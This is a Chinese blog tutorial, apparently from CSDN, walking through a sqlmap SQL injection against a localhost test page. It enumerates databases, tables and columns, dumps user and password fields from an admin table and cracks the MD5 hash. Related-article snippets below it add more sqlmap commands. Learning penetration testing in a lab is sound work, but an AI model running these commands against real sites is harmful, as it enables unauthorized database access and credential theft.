sqlmap之(四)----Mysql注入实战

最新推荐文章于 2024-04-18 10:26:33 发布
最新推荐文章于 2024-04-18 10:26:33 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 网络攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangliu463884153/article/details/80029054
版权

(1) 查找数据库

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs  

 

 

 

数据库有8个。

 

(2) 通过第一步的数据库查找表(假如数据库名为test)

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables  

 

 


 

猜解出来里面存在admin,sqltest两个表。

 

(3) 通过2中的表得出列名(假如表为admin)

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns  


 

 

 

(4) 获取字段的值(假如扫描出id,user,pwd字段)

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump  

 

 

 

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

你想存储的哈希值来与其他工具最终进一步处理临时文件?   输入"Y"

 

do you want to crack them via a dictionary-based attack? [Y/n/q]

你想通过基于字典的攻击来破解他们吗?  输入"N"

 

马上就得到了用户名

 

与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"

寂地沉
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之——sqlmap教程
JieDG的博客
05-16 374
一、指定注入点 -u:指定注入点url 需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch 二、暴库 一条命令即可曝出该sqlserver中所有数据库名称,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
sqlmap注入实例
~初出茅庐~ 的博客
10-16 1101
第一步: 安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。 附件(Python2.7.1安装包+sqlmap包): https://download.csdn.net/download/qq_23306363/10724195 第二步: 1)win+R,输入cmd,输入 cd c:\ 进入c盘 2)确定网址:如"http://XXX" 3)输入...
注入神器 --SQLMAP使用示例
Kevin's Blog
04-20 2384
文章目录输出结果详细程度 输出结果详细程度 -v (控制sqlmap结果输出的详细程度,7个级别,默认为1) 0,仅显示回溯,错误和严重信息 1,显示警告信息 2,显示调试信息 3,显示注入的有效载荷 4,显示HTTP请求 5,显示HTTP响应的标头 6,显示HTTP响应的页面内容 ...
SQLmap注入学习实战 —— dvwa 从low到impossble
qq_40476955的博客
01-10 6246
大晚上失眠了于是来写博客 你为啥这么勤奋 白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。 low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大 爆破库名 由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这
mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战
weixin_35934037的博客
02-18 814
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
墨者学院之SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 825
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
sqlmap的使用_sqlmap --force-ssl(2),2024年最新2024大厂网络安全知识点总结
2301_76225520的博客
04-18 415
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。-d: 直接连接数据库 (-d “mysql://user:passward@地址:端口/数据库名称”)3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
【网络安全 | 渗透工具】SQLmap加密注入教程+实战详析
等风来
08-02 6121
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
SQLmap注入
RAFANra的博客
04-07 367
Salmap注入网站 Sqlmap工具简介 sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。 有许多其它SQL 射入工具在网, 但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试, 辨认和利用网应用的SQL 射入在安全上的弱点。 什么是SQL注入漏洞 攻击者利用Web应用程序对
sqlmap注入
Qeminco的博客。
12-23 459
sqlmap注入流程一、判断SQL注入点二、查询数据库信息三、查询表的信息、查询字段的信息五、通过字段查询字段的值 一、判断SQL注入sqlmap.py -u “网址” 二、查询数据库信息 sqlmap.py -u “网址” --dbs 三、查询表的信息 通过数据库查询数据表的信息 sqlmap.py -u “网址” -D cake --tables 、查询字段的信息 通过数据表查询字段的信息 sqlmap.py -u “网址” -D cake -T user -columns 五、通过字段查询字段
sqlmap进行SQL注入
weixin_45095113的博客
03-16 556
sqlmap跑SQL注入
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1848
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入
sqlmap之sql注入(二)
m0_55313512的博客
02-27 2690
SQL注入(二)
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2964
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
网络管理mysql实验总结_网络安全实验报告 第二章
weixin_28884205的博客
02-05 428
利用TCP协议实现synflood攻击运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态。利用xdos工具进行攻击首先在192.168.1.3的目标机器上打开wireshark,过滤出ip.dst=192.168.1.3的IP包。再在192.168.1.2的发动攻击的主机上输入命令:192.168.1.3 135 -t 3 -s 55.55.55.55。利用wireshar...
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 2646
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
E109:数据库安全实战 - SQLMap注入MySQL漏洞利用教程
本资源是一份关于数据库安全的教程,具体涉及如何使用SQLMap工具对MySQL数据库进行注入攻击的实战演示。SQLMap是一个广泛使用的开源工具,用于自动化SQL注入漏洞检测和利用。在本课程中,它将指导学习者在Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值